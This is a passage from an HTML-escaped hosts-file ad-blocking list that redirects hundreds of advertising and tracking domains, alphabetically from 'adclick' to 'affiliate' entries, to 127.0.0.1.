/&gt;127.0.0.1 adclick.gamespy.com&lt;br /&gt;127.0.0.1 adclick.mint.se&lt;br /&gt;127.0.0.1 adclick.ro&lt;br /&gt;127.0.0.1 adclient.rottentomatoes.com&lt;br /&gt;127.0.0.1 adclient1.tucows.com&lt;br /&gt;127.0.0.1 adcomplete.com&lt;br /&gt;127.0.0.1 adcontent.gamespy.com&lt;br /&gt;127.0.0.1 adcontroller.unicast.com&lt;br /&gt;127.0.0.1 adcreative.tribuneinteractive.com&lt;br /&gt;127.0.0.1 adcycle.com&lt;br /&gt;127.0.0.1 adcycle.icpeurope.net&lt;br /&gt;127.0.0.1 addcontrol.net&lt;br /&gt;127.0.0.1 addesktop.com&lt;br /&gt;127.0.0.1 addfreestats.com&lt;br /&gt;127.0.0.1 addme.com&lt;br /&gt;127.0.0.1 addynamix.com&lt;br /&gt;127.0.0.1 adengage.com&lt;br /&gt;127.0.0.1 adext.inkclub.com&lt;br /&gt;127.0.0.1 adfarm.mediaplex.com&lt;br /&gt;127.0.0.1 adfiles.api.no&lt;br /&gt;127.0.0.1 adflight.com&lt;br /&gt;127.0.0.1 adfly.com&lt;br /&gt;127.0.0.1 adhostcenter.com&lt;br /&gt;127.0.0.1 adi.mainichi.co.jp&lt;br /&gt;127.0.0.1 adimage.asiaone.com.sg&lt;br /&gt;127.0.0.1 adimages.been.com&lt;br /&gt;127.0.0.1 adimages.carsoup.com&lt;br /&gt;127.0.0.1 adimages.go.com&lt;br /&gt;127.0.0.1 adimages.homestore.com&lt;br /&gt;127.0.0.1 adimages.sanomawsoy.fi&lt;br /&gt;127.0.0.1 adimg.cnet.com&lt;br /&gt;127.0.0.1 adimg.com.com&lt;br /&gt;127.0.0.1 adimg1.chosun.com&lt;br /&gt;127.0.0.1 adimgs.sapo.pt&lt;br /&gt;127.0.0.1 adincl.gopher.com&lt;br /&gt;127.0.0.1 adition.de&lt;br /&gt;127.0.0.1 adition.net&lt;br /&gt;127.0.0.1 adjuggler.yourdictionary.com&lt;br /&gt;127.0.0.1 adlegend.com&lt;br /&gt;127.0.0.1 adlink.de&lt;br /&gt;127.0.0.1 adlog.com.com&lt;br /&gt;127.0.0.1 adlogix.net&lt;br /&gt;127.0.0.1 adm.ad.asap-asp.net&lt;br /&gt;127.0.0.1 adman.freeze.com&lt;br /&gt;127.0.0.1 admanagement.ch&lt;br /&gt;127.0.0.1 admanager.beweb.com&lt;br /&gt;127.0.0.1 admanager.btopenworld.com&lt;br /&gt;127.0.0.1 admanager.carsoup.com&lt;br /&gt;127.0.0.1 admanager.persianblog.com&lt;br /&gt;127.0.0.1 admaximize.com&lt;br /&gt;127.0.0.1 admedia.ro&lt;br /&gt;127.0.0.1 admeta.com&lt;br /&gt;127.0.0.1 admex.com&lt;br /&gt;127.0.0.1 adminder.com&lt;br /&gt;127.0.0.1 adminshop.com&lt;br /&gt;127.0.0.1 admonitor.com&lt;br /&gt;127.0.0.1 admonitor.net&lt;br /&gt;127.0.0.1 admotion.com.ar&lt;br /&gt;127.0.0.1 adnet.biz&lt;br /&gt;127.0.0.1 adnews.maddog2000.de&lt;br /&gt;127.0.0.1 ado.internet.cz&lt;br /&gt;127.0.0.1 adorigin.com&lt;br /&gt;127.0.0.1 adpepper.dk&lt;br /&gt;127.0.0.1 adpick.switchboard.com&lt;br /&gt;127.0.0.1 adprofile.net&lt;br /&gt;127.0.0.1 adprojekt.pl&lt;br /&gt;127.0.0.1 adpush.dreamscape.com&lt;br /&gt;127.0.0.1 adq.nextag.com&lt;br /&gt;127.0.0.1 adremedy.com&lt;br /&gt;127.0.0.1 adremote.pathfinder.com&lt;br /&gt;127.0.0.1 adrenaline.cz&lt;br /&gt;127.0.0.1 adrenalinesk.sk&lt;br /&gt;127.0.0.1 adreporting.com&lt;br /&gt;127.0.0.1 adres.internet.com&lt;br /&gt;127.0.0.1 adrevolver.com&lt;br /&gt;127.0.0.1 adrevolver.holzmannverlag.de&lt;br /&gt;127.0.0.1 adriver.ru&lt;br /&gt;127.0.0.1 adroar.com&lt;br /&gt;127.0.0.1 adrotate.de&lt;br /&gt;127.0.0.1 adrotator.net&lt;br /&gt;127.0.0.1 ads-205.quarterserver.de&lt;br /&gt;127.0.0.1 ads-de.spray.net&lt;br /&gt;127.0.0.1 ads.100asians.com&lt;br /&gt;127.0.0.1 ads.5ci.lt&lt;br /&gt;127.0.0.1 ads.aceweb.net&lt;br /&gt;127.0.0.1 ads.adshareware.net&lt;br /&gt;127.0.0.1 ads.adultfriendfinder.com&lt;br /&gt;127.0.0.1 ads.advance.net&lt;br /&gt;127.0.0.1 ads.adverline.com&lt;br /&gt;127.0.0.1 ads.affiliates.match.com&lt;br /&gt;127.0.0.1 ads.allsites.com&lt;br /&gt;127.0.0.1 ads.alwayson-network.com&lt;br /&gt;127.0.0.1 ads.amazingmedia.com&lt;br /&gt;127.0.0.1 ads.amdmb.com&lt;br /&gt;127.0.0.1 ads.aol.com&lt;br /&gt;127.0.0.1 ads.as4x.tmcs.net&lt;br /&gt;127.0.0.1 ads.asia1.com.sg&lt;br /&gt;127.0.0.1 ads.asiafriendfinder.com&lt;br /&gt;127.0.0.1 ads.aspalliance.com&lt;br /&gt;127.0.0.1 ads.battle.net&lt;br /&gt;127.0.0.1 ads.belointeractive.com&lt;br /&gt;127.0.0.1 ads.berlinonline.de&lt;br /&gt;127.0.0.1 ads.betanews.com&lt;br /&gt;127.0.0.1 ads.bfast.com&lt;br /&gt;127.0.0.1 ads.bigcitytools.com&lt;br /&gt;127.0.0.1 ads.bigfoot.com&lt;br /&gt;127.0.0.1 ads.billiton.de&lt;br /&gt;127.0.0.1 ads.bitsonthewire.com&lt;br /&gt;127.0.0.1 ads.blick.ch&lt;br /&gt;127.0.0.1 ads.bloomberg.com&lt;br /&gt;127.0.0.1 ads.bluemountain.com&lt;br /&gt;127.0.0.1 ads.box.sk&lt;br /&gt;127.0.0.1 ads.businessweek.com&lt;br /&gt;127.0.0.1 ads.canalblog.com&lt;br /&gt;127.0.0.1 ads.canoe.ca&lt;br /&gt;127.0.0.1 ads.cavello.com&lt;br /&gt;127.0.0.1 ads.cbc.ca&lt;br /&gt;127.0.0.1 ads.cdfreaks.com&lt;br /&gt;127.0.0.1 ads.centraliprom.com&lt;br /&gt;127.0.0.1 ads.cgnetworks.com&lt;br /&gt;127.0.0.1 ads.channel4.com&lt;br /&gt;127.0.0.1 ads.cimedia.com&lt;br /&gt;127.0.0.1 ads.clearchannel.com&lt;br /&gt;127.0.0.1 ads.collegclub.com&lt;br /&gt;127.0.0.1 ads.com.com&lt;br /&gt;127.0.0.1 ads.currantbun.com&lt;br /&gt;127.0.0.1 ads.cyberfight.ru&lt;br /&gt;127.0.0.1 ads.cybersales.cz&lt;br /&gt;127.0.0.1 ads.danworld.net&lt;br /&gt;127.0.0.1 ads.datingyes.com&lt;br /&gt;127.0.0.1 ads.dbforums.com&lt;br /&gt;127.0.0.1 ads.ddj.com&lt;br /&gt;127.0.0.1 ads.deltha.hu&lt;br /&gt;127.0.0.1 ads.dennisnet.co.uk&lt;br /&gt;127.0.0.1 ads.desmoinesregister.com&lt;br /&gt;127.0.0.1 ads.detelefoongids.nl&lt;br /&gt;127.0.0.1 ads.developershed.com&lt;br /&gt;127.0.0.1 ads.deviantart.com&lt;br /&gt;127.0.0.1 ads.digitalmedianet.com&lt;br /&gt;127.0.0.1 ads.digitalpoint.com&lt;br /&gt;127.0.0.1 ads.directionsmag.com&lt;br /&gt;127.0.0.1 ads.discovery.com&lt;br /&gt;127.0.0.1 ads.dk&lt;br /&gt;127.0.0.1 ads.dmk-internet.com&lt;br /&gt;127.0.0.1 ads.e-planning.net&lt;br /&gt;127.0.0.1 ads.edbindex.dk&lt;br /&gt;127.0.0.1 ads.einmedia.com&lt;br /&gt;127.0.0.1 ads.erotism.com&lt;br /&gt;127.0.0.1 ads.esmas.com&lt;br /&gt;127.0.0.1 ads.eu.msn.com&lt;br /&gt;127.0.0.1 ads.eudora.com&lt;br /&gt;127.0.0.1 ads.exhedra.com&lt;br /&gt;127.0.0.1 ads.ezboard.com&lt;br /&gt;127.0.0.1 ads.fairfax.com.au&lt;br /&gt;127.0.0.1 ads.filmup.com&lt;br /&gt;127.0.0.1 ads.firingsquad.com&lt;br /&gt;127.0.0.1 ads.flooble.com&lt;br /&gt;127.0.0.1 ads.floridatoday.com&lt;br /&gt;127.0.0.1 ads.fool.com&lt;br /&gt;127.0.0.1 ads.forbes.com&lt;br /&gt;127.0.0.1 ads.forbes.net&lt;br /&gt;127.0.0.1 ads.forium.de&lt;br /&gt;127.0.0.1 ads.fortunecity.com&lt;br /&gt;127.0.0.1 ads.foxkidseurope.net&lt;br /&gt;127.0.0.1 ads.freecity.de&lt;br /&gt;127.0.0.1 ads.freeze.com&lt;br /&gt;127.0.0.1 ads.friendtest.com&lt;br /&gt;127.0.0.1 ads.ft.com&lt;br /&gt;127.0.0.1 ads.g4techtv.com&lt;br /&gt;127.0.0.1 ads.game.net&lt;br /&gt;127.0.0.1 ads.gamecity.net&lt;br /&gt;127.0.0.1 ads.gamecopyworld.no&lt;br /&gt;127.0.0.1 ads.gameforgeads.de&lt;br /&gt;127.0.0.1 ads.gamershell.com&lt;br /&gt;127.0.0.1 ads.gamespy.com&lt;br /&gt;127.0.0.1 ads.gamespyid.com&lt;br /&gt;127.0.0.1 ads.gamigo.de&lt;br /&gt;127.0.0.1 ads.gawker.com&lt;br /&gt;127.0.0.1 ads.gettools.com&lt;br /&gt;127.0.0.1 ads.globeandmail.com&lt;br /&gt;127.0.0.1 ads.gotfrag.com&lt;br /&gt;127.0.0.1 ads.goyk.com&lt;br /&gt;127.0.0.1 ads.grindinggears.com&lt;br /&gt;127.0.0.1 ads.guardian.co.uk&lt;br /&gt;127.0.0.1 ads.guardianunlimited.co.uk&lt;br /&gt;127.0.0.1 ads.hbv.de&lt;br /&gt;127.0.0.1 ads.heartlight.org&lt;br /&gt;127.0.0.1 ads.herald-sun.com&lt;br /&gt;127.0.0.1 ads.hollywood.com&lt;br /&gt;127.0.0.1 ads.humorbua.no&lt;br /&gt;127.0.0.1 ads.iafrica.com&lt;br /&gt;127.0.0.1 ads.iboost.com&lt;br /&gt;127.0.0.1 ads.icq.com&lt;br /&gt;127.0.0.1 ads.ign.com&lt;br /&gt;127.0.0.1 ads.imdb.com&lt;br /&gt;127.0.0.1 ads.img.co.za&lt;br /&gt;127.0.0.1 ads.indya.com&lt;br /&gt;127.0.0.1 ads.indystar.com&lt;br /&gt;127.0.0.1 ads.inetfast.com&lt;br /&gt;127.0.0.1 ads.inetinteractive.com&lt;br /&gt;127.0.0.1 ads.infi.net&lt;br /&gt;127.0.0.1 ads.infospace.com&lt;br /&gt;127.0.0.1 ads.internic.co.il&lt;br /&gt;127.0.0.1 ads.inthemix.com.au&lt;br /&gt;127.0.0.1 ads.ipowerweb.com&lt;br /&gt;127.0.0.1 ads.isoftmarketing.com&lt;br /&gt;127.0.0.1 ads.itv.com&lt;br /&gt;127.0.0.1 ads.iwon.com&lt;br /&gt;127.0.0.1 ads.jimworld.com&lt;br /&gt;127.0.0.1 ads.jpost.com&lt;br /&gt;127.0.0.1 ads.jubii.dk&lt;br /&gt;127.0.0.1 ads.katz.ws&lt;br /&gt;127.0.0.1 ads.kinobox.cz&lt;br /&gt;127.0.0.1 ads.krawall.de&lt;br /&gt;127.0.0.1 ads.leo.org&lt;br /&gt;127.0.0.1 ads.linuxjournal.com&lt;br /&gt;127.0.0.1 ads.linuxquestions.org&lt;br /&gt;127.0.0.1 ads.linuxsecurity.com&lt;br /&gt;127.0.0.1 ads.lnkworld.com&lt;br /&gt;127.0.0.1 ads.localnow.com&lt;br /&gt;127.0.0.1 ads.lycos-europe.com&lt;br /&gt;127.0.0.1 ads.lycos.com&lt;br /&gt;127.0.0.1 ads.madison.com&lt;br /&gt;127.0.0.1 ads.mariuana.it&lt;br /&gt;127.0.0.1 ads.mcafee.com&lt;br /&gt;127.0.0.1 ads.mediaodyssey.com&lt;br /&gt;127.0.0.1 ads.mediaturf.net&lt;br /&gt;127.0.0.1 ads.metropol.dk&lt;br /&gt;127.0.0.1 ads.mgnetwork.com&lt;br /&gt;127.0.0.1 ads.monster.com&lt;br /&gt;127.0.0.1 ads.msn.com&lt;br /&gt;127.0.0.1 ads.multimania.lycos.fr&lt;br /&gt;127.0.0.1 ads.musiccity.com&lt;br /&gt;127.0.0.1 ads.myguysolutions.com&lt;br /&gt;127.0.0.1 ads.mysimon.com&lt;br /&gt;127.0.0.1 ads.nandomedia.com&lt;br /&gt;127.0.0.1 ads.nationalreview.com&lt;br /&gt;127.0.0.1 ads.neoseeker.com&lt;br /&gt;127.0.0.1 ads.neowin.net&lt;br /&gt;127.0.0.1 ads.netmechanic.com&lt;br /&gt;127.0.0.1 ads.newcity.com&lt;br /&gt;127.0.0.1 ads.newcitynet.com&lt;br /&gt;127.0.0.1 ads.newdream.net&lt;br /&gt;127.0.0.1 ads.newmedia.cz&lt;br /&gt;127.0.0.1 ads.newsint.co.uk&lt;br /&gt;127.0.0.1 ads.newsobserver.com&lt;br /&gt;127.0.0.1 ads.newsquest.co.uk&lt;br /&gt;127.0.0.1 ads.newtimes.com&lt;br /&gt;127.0.0.1 ads.ngenuity.com&lt;br /&gt;127.0.0.1 ads.ninemsn.com.au&lt;br /&gt;127.0.0.1 ads.nola.com&lt;br /&gt;127.0.0.1 ads.nordichardware.se&lt;br /&gt;127.0.0.1 ads.ntadvice.com&lt;br /&gt;127.0.0.1 ads.nwsource.com&lt;br /&gt;127.0.0.1 ads.nyi.net&lt;br /&gt;127.0.0.1 ads.nyjournalnews.com&lt;br /&gt;127.0.0.1 ads.nypost.com&lt;br /&gt;127.0.0.1 ads.nytimes.com&lt;br /&gt;127.0.0.1 ads.nzcity.co.nz&lt;br /&gt;127.0.0.1 ads.ole.com&lt;br /&gt;127.0.0.1 ads.oneplace.com&lt;br /&gt;127.0.0.1 ads.onlineguiden.com&lt;br /&gt;127.0.0.1 ads.optusnet.com.au&lt;br /&gt;127.0.0.1 ads.orsm.net&lt;br /&gt;127.0.0.1 ads.osdn.com&lt;br /&gt;127.0.0.1 ads.osnews.com&lt;br /&gt;127.0.0.1 ads.ourbrisbane.com&lt;br /&gt;127.0.0.1 ads.overclockers.at&lt;br /&gt;127.0.0.1 ads.pcper.com&lt;br /&gt;127.0.0.1 ads.peel.com&lt;br /&gt;127.0.0.1 ads.phparena.net&lt;br /&gt;127.0.0.1 ads.phpclasses.org&lt;br /&gt;127.0.0.1 ads.pittsburghlive.com&lt;br /&gt;127.0.0.1 ads.planet.nl&lt;br /&gt;127.0.0.1 ads.pni.com&lt;br /&gt;127.0.0.1 ads.powweb.com&lt;br /&gt;127.0.0.1 ads.premiumnetwork.com&lt;br /&gt;127.0.0.1 ads.primeinteractive.net&lt;br /&gt;127.0.0.1 ads.prisacom.com&lt;br /&gt;127.0.0.1 ads.pro-market.net&lt;br /&gt;127.0.0.1 ads.realcities.com&lt;br /&gt;127.0.0.1 ads.realmedia.de&lt;br /&gt;127.0.0.1 ads.recoletos.es&lt;br /&gt;127.0.0.1 ads.rediff.com&lt;br /&gt;127.0.0.1 ads.rivals.net&lt;br /&gt;127.0.0.1 ads.rottentomatoes.com&lt;br /&gt;127.0.0.1 ads.rp-online.de&lt;br /&gt;127.0.0.1 ads.rpgdot.com&lt;br /&gt;127.0.0.1 ads.rpgui.com&lt;br /&gt;127.0.0.1 ads.satyamonline.com&lt;br /&gt;127.0.0.1 ads.savannahnow.com&lt;br /&gt;127.0.0.1 ads.scifi.com&lt;br /&gt;127.0.0.1 ads.sexplanets.com&lt;br /&gt;127.0.0.1 ads.shareprovider.com&lt;br /&gt;127.0.0.1 ads.sify.com&lt;br /&gt;127.0.0.1 ads.simtel.net&lt;br /&gt;127.0.0.1 ads.smartclick.com&lt;br /&gt;127.0.0.1 ads.softwareoutfit.com&lt;br /&gt;127.0.0.1 ads.space.com&lt;br /&gt;127.0.0.1 ads.sptimes.com&lt;br /&gt;127.0.0.1 ads.stationplay.com&lt;br /&gt;127.0.0.1 ads.stileproject.com&lt;br /&gt;127.0.0.1 ads.storagereview.net&lt;br /&gt;127.0.0.1 ads.stratics.com&lt;br /&gt;127.0.0.1 ads.switchboard.com&lt;br /&gt;127.0.0.1 ads.techtv.com&lt;br /&gt;127.0.0.1 ads.telegraaf.nl&lt;br /&gt;127.0.0.1 ads.telegraph.co.uk&lt;br /&gt;127.0.0.1 ads.theglobeandmail.com&lt;br /&gt;127.0.0.1 ads.thestar.com&lt;br /&gt;127.0.0.1 ads.thewebfreaks.com&lt;br /&gt;127.0.0.1 ads.thottbot.com&lt;br /&gt;127.0.0.1 ads.tiscali.fr&lt;br /&gt;127.0.0.1 ads.tmcs.net&lt;br /&gt;127.0.0.1 ads.top500.org&lt;br /&gt;127.0.0.1 ads.townhall.com&lt;br /&gt;127.0.0.1 ads.tripod.com&lt;br /&gt;127.0.0.1 ads.tripod.lycos.co.uk&lt;br /&gt;127.0.0.1 ads.tripod.lycos.de&lt;br /&gt;127.0.0.1 ads.tripod.lycos.nl&lt;br /&gt;127.0.0.1 ads.tucows.com&lt;br /&gt;127.0.0.1 ads.ucomics.com&lt;br /&gt;127.0.0.1 ads.uigc.net&lt;br /&gt;127.0.0.1 ads.unixathome.org&lt;br /&gt;127.0.0.1 ads.urli.net&lt;br /&gt;127.0.0.1 ads.usatoday.com&lt;br /&gt;127.0.0.1 ads.v3.com&lt;br /&gt;127.0.0.1 ads.v3exchange.com&lt;br /&gt;127.0.0.1 ads.vesperexchange.com&lt;br /&gt;127.0.0.1 ads.videoaxs.com&lt;br /&gt;127.0.0.1 ads.virtual-nights.com&lt;br /&gt;127.0.0.1 ads.virtualcountries.com&lt;br /&gt;127.0.0.1 ads.vnuemedia.com&lt;br /&gt;127.0.0.1 ads.vnumedia.com&lt;br /&gt;127.0.0.1 ads.wanadooregie.com&lt;br /&gt;127.0.0.1 ads.weather.ca&lt;br /&gt;127.0.0.1 ads.weather.com&lt;br /&gt;127.0.0.1 ads.web.aol.com&lt;br /&gt;127.0.0.1 ads.web.cs.com&lt;br /&gt;127.0.0.1 ads.web.de&lt;br /&gt;127.0.0.1 ads.web21.com&lt;br /&gt;127.0.0.1 ads.webattack.com&lt;br /&gt;127.0.0.1 ads.webheat.com&lt;br /&gt;127.0.0.1 ads.webnet.advance.net&lt;br /&gt;127.0.0.1 ads.whi.co.nz&lt;br /&gt;127.0.0.1 ads.winsite.com&lt;br /&gt;127.0.0.1 ads.wunderground.com&lt;br /&gt;127.0.0.1 ads.x10.com&lt;br /&gt;127.0.0.1 ads.x10.net&lt;br /&gt;127.0.0.1 ads.xtra.co.nz&lt;br /&gt;127.0.0.1 ads.yourfreedvds.com&lt;br /&gt;127.0.0.1 ads.zdnet.com&lt;br /&gt;127.0.0.1 ads001.webwombat.com.au&lt;br /&gt;127.0.0.1 ads1.advance.net&lt;br /&gt;127.0.0.1 ads1.akkuna.com&lt;br /&gt;127.0.0.1 ads1.canoe.ca&lt;br /&gt;127.0.0.1 ads1.erotism.com&lt;br /&gt;127.0.0.1 ads1.mediacapital.pt&lt;br /&gt;127.0.0.1 ads1.sptimes.com&lt;br /&gt;127.0.0.1 ads1.theglobeandmail.com&lt;br /&gt;127.0.0.1 ads10.speedbit.com&lt;br /&gt;127.0.0.1 ads2.advance.net&lt;br /&gt;127.0.0.1 ads2.akkuna.com&lt;br /&gt;127.0.0.1 ads2.clearchannel.com&lt;br /&gt;127.0.0.1 ads2.collegclub.com&lt;br /&gt;127.0.0.1 ads2.collegeclub.com&lt;br /&gt;127.0.0.1 ads2.exhedra.com&lt;br /&gt;127.0.0.1 ads2.firingsquad.com&lt;br /&gt;127.0.0.1 ads2.gamecity.net&lt;br /&gt;127.0.0.1 ads2.jubii.dk&lt;br /&gt;127.0.0.1 ads2.oneplace.com&lt;br /&gt;127.0.0.1 ads2.osdn.com&lt;br /&gt;127.0.0.1 ads2.top500.org&lt;br /&gt;127.0.0.1 ads3.advance.net&lt;br /&gt;127.0.0.1 ads3.gamecity.net&lt;br /&gt;127.0.0.1 ads360.com&lt;br /&gt;127.0.0.1 ads4.advance.net&lt;br /&gt;127.0.0.1 ads4.clearchannel.com&lt;br /&gt;127.0.0.1 ads4.gamecity.net&lt;br /&gt;127.0.0.1 ads4.realcities.com&lt;br /&gt;127.0.0.1 ads4homes.com&lt;br /&gt;127.0.0.1 ads5.advance.net&lt;br /&gt;127.0.0.1 ads5.canoe.ca&lt;br /&gt;127.0.0.1 ads6.advance.net&lt;br /&gt;127.0.0.1 ads6.gamecity.net&lt;br /&gt;127.0.0.1 ads7.gamecity.net&lt;br /&gt;127.0.0.1 ads8.com&lt;br /&gt;127.0.0.1 adsag.com&lt;br /&gt;127.0.0.1 Adsatt.ABCNews.starwave.com&lt;br /&gt;127.0.0.1 adsatt.espn.go.com&lt;br /&gt;127.0.0.1 adsatt.espn.starwave.com&lt;br /&gt;127.0.0.1 Adsatt.go.starwave.com&lt;br /&gt;127.0.0.1 adscholar.com&lt;br /&gt;127.0.0.1 adscpm.com&lt;br /&gt;127.0.0.1 adsdaq.com&lt;br /&gt;127.0.0.1 adserv.aip.org&lt;br /&gt;127.0.0.1 adserv.gamezone.de&lt;br /&gt;127.0.0.1 adserv.geocomm.com&lt;br /&gt;127.0.0.1 adserv.happypuppy.com&lt;br /&gt;127.0.0.1 adserv.iafrica.com&lt;br /&gt;127.0.0.1 adserv.lwmn.net&lt;br /&gt;127.0.0.1 adserv.quality-channel.de&lt;br /&gt;127.0.0.1 adserv1.winboard.org&lt;br /&gt;127.0.0.1 adserve.viaarena.com&lt;br /&gt;127.0.0.1 adserver.71i.de&lt;br /&gt;127.0.0.1 adserver.adultfriendfinder.com&lt;br /&gt;127.0.0.1 adserver.allerinternett.com&lt;br /&gt;127.0.0.1 adserver.anm.co.uk&lt;br /&gt;127.0.0.1 adserver.ath.cx&lt;br /&gt;127.0.0.1 adserver.billiger-surfen.de&lt;br /&gt;127.0.0.1 adserver.billiger-telefonieren.de&lt;br /&gt;127.0.0.1 adserver.bluewin.ch&lt;br /&gt;127.0.0.1 adserver.colleges.com&lt;br /&gt;127.0.0.1 adserver.com&lt;br /&gt;127.0.0.1 adserver.conjelco.com&lt;br /&gt;127.0.0.1 adserver.developersnetwork.com&lt;br /&gt;127.0.0.1 adserver.digitoday.com&lt;br /&gt;127.0.0.1 adserver.dotcommedia.de&lt;br /&gt;127.0.0.1 adserver.eudora.com&lt;br /&gt;127.0.0.1 adserver.filefront.com&lt;br /&gt;127.0.0.1 adserver.freecity.de&lt;br /&gt;127.0.0.1 adserver.freenet.de&lt;br /&gt;127.0.0.1 adserver.friendfinder.com&lt;br /&gt;127.0.0.1 adserver.gamesquad.net&lt;br /&gt;127.0.0.1 adserver.garden.com&lt;br /&gt;127.0.0.1 adserver.geizkragen.de&lt;br /&gt;127.0.0.1 adserver.gr&lt;br /&gt;127.0.0.1 adserver.hardwareanalysis.com&lt;br /&gt;127.0.0.1 adserver.hispavista.com&lt;br /&gt;127.0.0.1 adserver.humanux.com&lt;br /&gt;127.0.0.1 adserver.ign.com&lt;br /&gt;127.0.0.1 adserver.isonews.com&lt;br /&gt;127.0.0.1 adserver.itsfogo.com&lt;br /&gt;127.0.0.1 adserver.janes.com&lt;br /&gt;127.0.0.1 adserver.jolt.co.uk&lt;br /&gt;127.0.0.1 adserver.journalinteractive.com&lt;br /&gt;127.0.0.1 adserver.legacy-network.com&lt;br /&gt;127.0.0.1 adserver.libero.it&lt;br /&gt;127.0.0.1 adserver.m2kcore.com&lt;br /&gt;127.0.0.1 adserver.monster.com&lt;br /&gt;127.0.0.1 adserver.news.com.au&lt;br /&gt;127.0.0.1 adserver.ngz-network.de&lt;br /&gt;127.0.0.1 adserver.nydailynews.com&lt;br /&gt;127.0.0.1 adserver.nzoom.com&lt;br /&gt;127.0.0.1 adserver.pl&lt;br /&gt;127.0.0.1 adserver.plhb.com&lt;br /&gt;127.0.0.1 adserver.portalofevil.com&lt;br /&gt;127.0.0.1 adserver.portugalmail.net&lt;br /&gt;127.0.0.1 adserver.portugalmail.pt&lt;br /&gt;127.0.0.1 adserver.ro&lt;br /&gt;127.0.0.1 adserver.sanomawsoy.fi&lt;br /&gt;127.0.0.1 adserver.securityfocus.com&lt;br /&gt;127.0.0.1 adserver.sharewareonline.com&lt;br /&gt;127.0.0.1 adserver.snowball.com&lt;br /&gt;127.0.0.1 adserver.startnow.com&lt;br /&gt;127.0.0.1 adserver.terra.es&lt;br /&gt;127.0.0.1 adserver.theonering.net&lt;br /&gt;127.0.0.1 adserver.track-star.com&lt;br /&gt;127.0.0.1 adserver.trb.com&lt;br /&gt;127.0.0.1 adserver.tribuneinteractive.com&lt;br /&gt;127.0.0.1 adserver.ugo.com&lt;br /&gt;127.0.0.1 adserver.usermagnet.com&lt;br /&gt;127.0.0.1 adserver.visions.de&lt;br /&gt;127.0.0.1 adserver.webhostlist.de&lt;br /&gt;127.0.0.1 adserver.yahoo.com&lt;br /&gt;127.0.0.1 adserver1-images.backbeatmedia.com&lt;br /&gt;127.0.0.1 adserver1.backbeatmedia.com&lt;br /&gt;127.0.0.1 adserver1.mediainsight.de&lt;br /&gt;127.0.0.1 adserver1.ogilvy-interactive.de&lt;br /&gt;127.0.0.1 adserver1.shareconnector.com&lt;br /&gt;127.0.0.1 adserver2.mediainsight.de&lt;br /&gt;127.0.0.1 adserver2.popdata.de&lt;br /&gt;127.0.0.1 adserver3.eudora.com&lt;br /&gt;127.0.0.1 adserver4.eudora.com&lt;br /&gt;127.0.0.1 adserversolutions.com&lt;br /&gt;127.0.0.1 adservervv.geizkragen.de&lt;br /&gt;127.0.0.1 adserving.eleven-agency.com&lt;br /&gt;127.0.0.1 adservingcentral.com&lt;br /&gt;127.0.0.1 adsfac.net&lt;br /&gt;127.0.0.1 adshadow.net&lt;br /&gt;127.0.0.1 adsmart.co.uk&lt;br /&gt;127.0.0.1 adsmart.com&lt;br /&gt;127.0.0.1 adsmart.net&lt;br /&gt;127.0.0.1 adsmusic.com&lt;br /&gt;127.0.0.1 adsnew.userfriendly.org&lt;br /&gt;127.0.0.1 adsoftware.com&lt;br /&gt;127.0.0.1 adsoldier.com&lt;br /&gt;127.0.0.1 adsp.ilse.nl&lt;br /&gt;127.0.0.1 adspace.ro&lt;br /&gt;127.0.0.1 adsremote.scripps.com&lt;br /&gt;127.0.0.1 adsrv.iol.co.za&lt;br /&gt;127.0.0.1 adsweb.tiscali.cz&lt;br /&gt;127.0.0.1 adsynergy.com&lt;br /&gt;127.0.0.1 adsystem.tt-forums.net&lt;br /&gt;127.0.0.1 adtech.de&lt;br /&gt;127.0.0.1 adtech.m7z.net&lt;br /&gt;127.0.0.1 adtoma.com&lt;br /&gt;127.0.0.1 adtrade.net&lt;br /&gt;127.0.0.1 adtrading.de&lt;br /&gt;127.0.0.1 adtrak.net&lt;br /&gt;127.0.0.1 adtrix.com&lt;br /&gt;127.0.0.1 adv-banner.libero.it&lt;br /&gt;127.0.0.1 adv.for-ua.com&lt;br /&gt;127.0.0.1 adv.freeonline.it&lt;br /&gt;127.0.0.1 adv.hwupgrade.it&lt;br /&gt;127.0.0.1 adv.isdn.cz&lt;br /&gt;127.0.0.1 adv.surinter.net&lt;br /&gt;127.0.0.1 adv.webmd.com&lt;br /&gt;127.0.0.1 adv.wp.pl&lt;br /&gt;127.0.0.1 adv.yo.cz&lt;br /&gt;127.0.0.1 adv1.videoprofessor.com&lt;br /&gt;127.0.0.1 advariant.com&lt;br /&gt;127.0.0.1 adventory.com&lt;br /&gt;127.0.0.1 adverity.com&lt;br /&gt;127.0.0.1 adverserve.net&lt;br /&gt;127.0.0.1 advert.bayarea.com&lt;br /&gt;127.0.0.1 advert.hi-media.com&lt;br /&gt;127.0.0.1 advert.hu&lt;br /&gt;127.0.0.1 adverticum.com&lt;br /&gt;127.0.0.1 adverticum.net&lt;br /&gt;127.0.0.1 advertiseireland.com&lt;br /&gt;127.0.0.1 advertising.com&lt;br /&gt;127.0.0.1 advertising.se&lt;br /&gt;127.0.0.1 advertisingbanners.com&lt;br /&gt;127.0.0.1 advertmarket.com&lt;br /&gt;127.0.0.1 advertmedia.de&lt;br /&gt;127.0.0.1 advertpro.sitepoint.com&lt;br /&gt;127.0.0.1 adverts.carltononline.com&lt;br /&gt;127.0.0.1 advertserve.com&lt;br /&gt;127.0.0.1 advertwizard.com&lt;br /&gt;127.0.0.1 adview.ppro.de&lt;br /&gt;127.0.0.1 adviva.net&lt;br /&gt;127.0.0.1 advlab.it&lt;br /&gt;127.0.0.1 advnt.com&lt;br /&gt;127.0.0.1 advnt01.com&lt;br /&gt;127.0.0.1 advnt02.com&lt;br /&gt;127.0.0.1 advnt03.com&lt;br /&gt;127.0.0.1 advnt04.com&lt;br /&gt;127.0.0.1 advspot.com&lt;br /&gt;127.0.0.1 adware.hu&lt;br /&gt;127.0.0.1 adwealth.com&lt;br /&gt;127.0.0.1 adweb.integctr.com&lt;br /&gt;127.0.0.1 adworldnetwork.com&lt;br /&gt;127.0.0.1 adworx.at&lt;br /&gt;127.0.0.1 adx.allstar.cz&lt;br /&gt;127.0.0.1 adx.arip.co.th&lt;br /&gt;127.0.0.1 adx.atnext.com&lt;br /&gt;127.0.0.1 adx.nu&lt;br /&gt;127.0.0.1 ady.arip.co.th&lt;br /&gt;127.0.0.1 adz.afterdawn.net&lt;br /&gt;127.0.0.1 affiliate.1800flowers.com&lt;br /&gt;127.0.0.1 affiliate.7host.com&lt;br /&gt;127.0.0.1 affiliate.cfdebt.com&lt;br /&gt;127.0.0.1 affiliate.doubleyourdating.com&lt;br 